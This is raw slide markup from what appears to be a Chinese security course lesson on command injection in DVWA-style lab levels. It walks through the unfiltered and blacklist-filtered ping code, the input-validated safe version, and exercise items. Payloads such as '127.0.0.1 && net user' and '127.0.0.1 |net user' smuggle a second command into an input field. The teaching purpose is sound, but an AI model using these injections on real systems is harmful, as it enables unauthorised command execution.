              <a:buSzTx/>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可以看到，服务器通过判断操作系统执行不同ping命令，但是对ip参数并未做任何的过滤，存在命令注入漏洞。</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4800"/>
            <a:ext cx="10943590" cy="52044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500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin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12</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>7.0.0.1 &amp;&amp; net user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>点击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>按钮。</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用命令net user查询到系统的用户列表，漏洞利用成功。</a:t>
            </a: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a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2"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919095" y="2724150"/>
            <a:ext cx="6353175" cy="3848100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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324800"/>
            <a:ext cx="10943590" cy="52044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500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【说明】命令连接符：</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin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500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>① &amp;&amp;：前面语句为真，则依次执行前面和后面语句。</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin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500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>②  &amp;：前面语句为真，则依次执行前面和后面语句。</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin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500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>③  |：前面语句为真，则执行后面语句。</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2"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ow级别的命令执行漏洞利用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90" y="1247775"/>
            <a:ext cx="10800080" cy="542798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级别的命令注入源代码</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="45720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（1）查看源代码</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10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服务器端对ip参数做了一定过滤，即把“&amp;&amp;”，“；”删除，本质上采用的是字符黑名单机制，因此依旧存在安全问题。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2147482563"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2772000" y="2136775"/>
            <a:ext cx="6658610" cy="3608705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>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级别的命令执行源代码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2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3051175" y="2773045"/>
            <a:ext cx="4829175" cy="3419475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="499110" y="1320165"/>
            <a:ext cx="10925810" cy="1274445"/>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4、出扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>报告</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin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cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）在下面的对话框中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>选择默认</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin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cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>点击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“OK”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>按钮，Firefox浏览器会打开扫描报告。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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90" y="1247775"/>
            <a:ext cx="11017250" cy="135255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级别的命令注入源代码</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="45720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注入：127.0.0.1 &amp; net user</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点击“Submit”。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命令注入成功。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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919600" y="2619375"/>
            <a:ext cx="6362700" cy="3848100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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00" y="1247775"/>
            <a:ext cx="10800000" cy="546354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分析high级别的命令注入源代码</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="45720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（1）查看源代码</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5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2" name="图片 -2147482561"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826000" y="2207895"/>
            <a:ext cx="6551930" cy="4196080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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90" y="1247775"/>
            <a:ext cx="10800080" cy="191325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分析high级别的命令注入源代码</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（2）源代码分析</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字符黑名单看似过滤了所有的非法字符，但仔细观察到是把“| ”（注意这里|后有一个空格）替换为空字符，于是“|”成了“漏网之鱼”。</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90" y="1247775"/>
            <a:ext cx="10800080" cy="135826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分析high级别的命令注入源代码</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="45720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（3）漏洞利用</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注入：“127.0.0.1 |net user”</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点击“Submit”</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按钮。</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命令注入成功。</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919600" y="2738120"/>
            <a:ext cx="6361200" cy="2286206"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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00" y="1247775"/>
            <a:ext cx="10800000" cy="88646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3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分析impossible级别的命令注入源代码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（1）查看源代码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4" name="图片 66"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3409200" y="2052955"/>
            <a:ext cx="5386070" cy="4608830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>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20090" y="1247775"/>
            <a:ext cx="10800080" cy="370903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3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分析impossible级别的命令注入源代码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（2）源代码分析</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500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>① 系统使用stripslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，explode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，is_numeric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数增加安全性。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>② 加入了Anti-CSRF token，同时对参数ip进行了严格的限制，只有诸如“数字.数字.数字.数字”的输入才会被接收执行，因此不存在命令执行漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="24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5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="361950" y="375285"/>
            <a:ext cx="11384915" cy="864235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit fontScale="8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555">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="350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50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500">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>级别的命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="3500">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="35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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>完成low级别的命令执行漏洞的利用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>完成medium、high和impossible命令执行漏洞源代码的分析。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>填写以下项目训练节点的名称或参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="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charset="0"/>
              <a:buChar char="p"/>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42275"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2295525" y="2428240"/>
          <a:ext cx="8157845" cy="3762375"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1069975"/>
                <a:gridCol w="422021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项目名称：6.5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>命令执行漏洞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low</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
